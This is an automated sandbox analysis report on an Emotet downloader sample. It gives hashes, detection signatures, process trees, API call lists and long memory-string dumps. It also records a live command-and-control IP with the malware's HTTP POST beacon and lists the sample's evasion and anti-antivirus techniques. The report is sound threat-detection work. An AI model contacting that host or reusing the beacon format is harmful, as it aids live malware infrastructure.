Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.DownLoader34.14035.3447.5325

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.DownLoader34.14035.3447.5325 (renamed file extension from 5325 to exe)
Analysis ID:255739
MD5:49767b7b931392f1d8cce39dc73f443c
SHA1:bce82b52b2db7bba32ee6329cb0d112de662e380
SHA256:b0bfcebf38da28e3b2f79c5fce62bf91f5c62efe5399a63069493cb9a2b8c418

Most interesting Screenshot:

Detection

Emotet
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • svchost.exe (PID: 7124 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1388 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2540 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6268 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6276 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6372 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6740 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7100 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6404 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2904 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.248081066.0000000000C41000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000001.00000002.516683693.0000000000AA0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000000.00000002.247934419.0000000000610000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000001.00000002.516869836.0000000000AB1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00AB1D9C CryptDecodeObjectEx,1_2_00AB1D9C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_00405DE0 FindFirstFileA,CloseHandle,0_2_00405DE0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_004051E0 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#800,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#800,#800,0_2_004051E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_00406240 _mbscmp,#535,_mbscmp,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,FindNextFileA,#537,_mbscmp,_mbscmp,#800,FindNextFileA,FindClose,#800,0_2_00406240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_00405F40 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#1168,#1669,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#1168,#2652,#800,0_2_00405F40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_00C428BC FindNextFileW,FindFirstFileW,FindClose,0_2_00C428BC
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00405DE0 FindFirstFileA,CloseHandle,1_2_00405DE0
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_004051E0 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#800,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#800,#800,1_2_004051E0
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00406240 _mbscmp,#535,_mbscmp,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,FindNextFileA,#537,_mbscmp,_mbscmp,#800,FindNextFileA,FindClose,#800,1_2_00406240
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00405F40 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#1168,#1669,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#1168,#2652,#800,1_2_00405F40
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00AB28BC FindNextFileW,FindFirstFileW,FindClose,1_2_00AB28BC

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.3:49725 -> 47.146.117.214:80
          Source: global trafficHTTP traffic detected: POST /EiNjgf2bWQ/oQ1qYoC1f28ZhMF2/Hpfhb9sn/m3L3O680Wtk/CBtZ1LyTyBYp5cFLU/ HTTP/1.1Referer: http://47.146.117.214/EiNjgf2bWQ/oQ1qYoC1f28ZhMF2/Hpfhb9sn/m3L3O680Wtk/CBtZ1LyTyBYp5cFLU/Content-Type: multipart/form-data; boundary=---------------------------009576963303513User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 47.146.117.214Content-Length: 4564Connection: Keep-AliveCache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 47.146.117.214
          Source: unknownTCP traffic detected without corresponding DNS query: 47.146.117.214
          Source: unknownTCP traffic detected without corresponding DNS query: 47.146.117.214
          Source: unknownTCP traffic detected without corresponding DNS query: 47.146.117.214
          Source: unknownTCP traffic detected without corresponding DNS query: 47.146.117.214
          Source: unknownTCP traffic detected without corresponding DNS query: 47.146.117.214
          Source: unknownTCP traffic detected without corresponding DNS query: 47.146.117.214
          Source: svchost.exe, 00000018.00000003.483972698.000001C21DF59000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
          Source: svchost.exe, 00000018.00000003.483972698.000001C21DF59000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
          Source: svchost.exe, 00000018.00000003.483865854.000001C21DF72000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-07-27T07:14:35.6749414Z||.||121f780f-ffc5-478c-bf53-6b53ed02cb1e||1152921505690835751||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2020-07-27T07:13:24.2771771Z","LocalizedProperties":[{"SkuDescript
          Source: svchost.exe, 00000018.00000003.483865854.000001C21DF72000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-07-27T07:14:35.6749414Z||.||121f780f-ffc5-478c-bf53-6b53ed02cb1e||1152921505690835751||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2020-07-27T07:13:24.2771771Z","LocalizedProperties":[{"SkuDescript
          Source: svchost.exe, 00000018.00000003.483844329.000001C21DF6A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","dT equals www.facebook.com (Facebook)
          Source: svchost.exe, 00000018.00000003.483844329.000001C21DF6A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","dT equals www.twitter.com (Twitter)
          Source: svchost.exe, 00000018.00000003.479078515.000001C21DF5C000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Game","Validatio
          Source: svchost.exe, 00000018.00000003.479078515.000001C21DF5C000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Game","Validatio
          Source: svchost.exe, 00000018.00000003.479078515.000001C21DF5C000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey 